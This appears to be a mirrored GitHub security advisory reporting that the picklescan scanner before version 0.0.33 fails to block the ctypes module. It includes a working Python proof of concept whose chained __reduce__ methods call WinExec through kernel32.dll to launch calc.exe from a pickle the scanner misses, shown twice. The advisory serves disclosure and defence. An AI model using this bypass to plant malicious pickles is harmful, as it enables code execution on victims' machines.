GHSA-4675-36F9-WF6R
Vulnerability from github – Published: 2025-12-29 15:23 – Updated: 2025-12-29 15:23
VLAI?
Summary
Picklescan does not block ctypes
Details
Summary
Picklescan doesnt flag ctypes module as a dangerous module, which is a huge issue. ctypes is basically a foreign function interface library and can be used to * Load DLLs * Call C functions directly * Manipulate memory raw pointers.
This can allow attackers to achieve RCE by invoking direct syscalls without going through blocked modules. Another major issue that ctypes being allowed presents is that it can be used down the line to dismantle interpreter based python sandboxes as ctypes allow direct access to raw memory.
This is a more severe loophole than normal gadget chains and bypasses as raw memory access can be used for a lot of nefarious purposes down the line if left undetected
PoC
import pickle
import ctypes
import operator
class Kernel32Loader:
def __reduce__(self):
#we go direct to the kerneeellllllll
return (ctypes.WinDLL, ("kernel32.dll",))
class WinExecGetter:
def __reduce__(self):
return (operator.itemgetter("WinExec"), (Kernel32Loader(),))
class PopCalc:
def __reduce__(self):
#methodcaller to invoke "__call__" on the function pointer.
return (
operator.methodcaller("__call__", b"calc.exe", 1),
(WinExecGetter(),)
)
try:
payload = pickle.dumps(PopCalc())
with open("calc_exploit.pkl", "wb") as f:
f.write(payload)
print("Generated 'calc_exploit.pkl'")
except Exception as e:
print(f"Generation failed: {e}")
This will create a pickle file which is not detected by the latest version of picklescan as malicious
import pickle
print("Loading bypass.pkl...")
pickle.load(open("calc_exploit.pkl", "rb"))
Severity ?
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "picklescan"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.0.33"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-184",
"CWE-913"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-29T15:23:49Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\nPicklescan doesnt flag ctypes module as a dangerous module, which is a huge issue. ctypes is basically a foreign function interface library and can be used to\n* Load DLLs\n* Call C functions directly\n* Manipulate memory raw pointers.\n\nThis can allow attackers to achieve RCE by invoking direct syscalls without going through blocked modules. Another major issue that ctypes being allowed presents is that it can be used down the line to dismantle interpreter based python sandboxes as ctypes allow direct access to raw memory.\n\nThis is a more severe loophole than normal gadget chains and bypasses as raw memory access can be used for a lot of nefarious purposes down the line if left undetected\n\n### PoC\n```python\nimport pickle\nimport ctypes\nimport operator\n\nclass Kernel32Loader:\n def __reduce__(self):\n #we go direct to the kerneeellllllll\n return (ctypes.WinDLL, (\"kernel32.dll\",))\n\nclass WinExecGetter:\n def __reduce__(self):\n return (operator.itemgetter(\"WinExec\"), (Kernel32Loader(),))\n\nclass PopCalc:\n def __reduce__(self):\n #methodcaller to invoke \"__call__\" on the function pointer.\n return (\n operator.methodcaller(\"__call__\", b\"calc.exe\", 1), \n (WinExecGetter(),)\n )\n\ntry:\n payload = pickle.dumps(PopCalc())\n \n with open(\"calc_exploit.pkl\", \"wb\") as f:\n f.write(payload)\n \n print(\"Generated \u0027calc_exploit.pkl\u0027\")\n\nexcept Exception as e:\n print(f\"Generation failed: {e}\")\n```\nThis will create a pickle file which is not detected by the latest version of picklescan as malicious\n\n```python\nimport pickle\nprint(\"Loading bypass.pkl...\")\npickle.load(open(\"calc_exploit.pkl\", \"rb\"))\n```\n\n\u003cimg width=\"1333\" height=\"677\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f5b066f3-116a-4377-a538-f293f3a6c176\" /\u003e",
"id": "GHSA-4675-36f9-wf6r",
"modified": "2025-12-29T15:23:49Z",
"published": "2025-12-29T15:23:49Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-4675-36f9-wf6r"
},
{
"type": "WEB",
"url": "https://github.com/mmaitre314/picklescan/pull/53"
},
{
"type": "WEB",
"url": "https://github.com/mmaitre314/picklescan/commit/70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab"
},
{
"type": "PACKAGE",
"url": "https://github.com/mmaitre314/picklescan"
},
{
"type": "WEB",
"url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.33"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "Picklescan does not block ctypes"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…